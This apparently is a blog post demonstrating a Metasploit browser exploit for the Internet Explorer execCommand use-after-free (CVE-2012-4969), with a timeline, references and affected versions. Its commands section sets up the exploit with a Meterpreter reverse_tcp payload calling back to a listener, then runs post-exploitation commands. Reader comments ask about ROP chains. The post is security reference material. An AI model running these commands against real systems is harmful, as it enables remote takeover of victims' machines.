CVE-2012-4969 Microsoft Internet Explorer execCommand Vulnerability Metasploit Demo

Timeline :

Vulnerability found exploited in the wild and discovered by Eric Romang
First details of the vulnerability the 2012-09-14
Advanced details of the vulnerability provided by binjo the 2012-09-16
Metasploit PoC provided the 2012-09-17

PoC provided by :

unknown
eromang
binjo
sinn3r
juan vazquez

Reference(s) :

OSVDB-85532
Vulnhunt.com
eromang blog
Metasploit
CVE-2012-4969
MSA-2757760
MS12-063

Affected version(s) :

IE 7 on Windows XP SP3
IE 8 on Windows XP SP3
IE 7 on Windows Vista
IE 8 on Windows Vista
IE 8 on Windows 7
IE 9 on Windows 7

Tested on Windows XP Pro SP3 with :

Internet Explorer 8

Description :

This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner, but the same memory is reused again later in the CMshtmlEd::Exec() function, leading to a use-after-free condition. Please note that this vulnerability has been exploited in the wild since Sep 14 2012, and there is currently no official patch for it.

Commands :

use exploit/windows/browser/ie_execcommand_uaf
set SRVHOST 192.168.178.33
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.33
exploit

sysinfo
getuid

13 thoughts on “CVE-2012-4969 Microsoft Internet Explorer execCommand Vulnerability Metasploit Demo

  1. I have tried using this JRE ROP after installing JRE version 1.5.0.50 on windows 7 machine. However The exploit does not seems to be working for me. Please note I have used some wild samples not the POC. This address 0x7c37653d appears to be unknown. Getting access violation. Could some one tell me what am i doing wrong here?

  2. hi,

    i wonder why the console says “using msvcrt ROP”, when i tried it, it says “using JRE ROP” ?

    thx
    klaus

Comments are closed.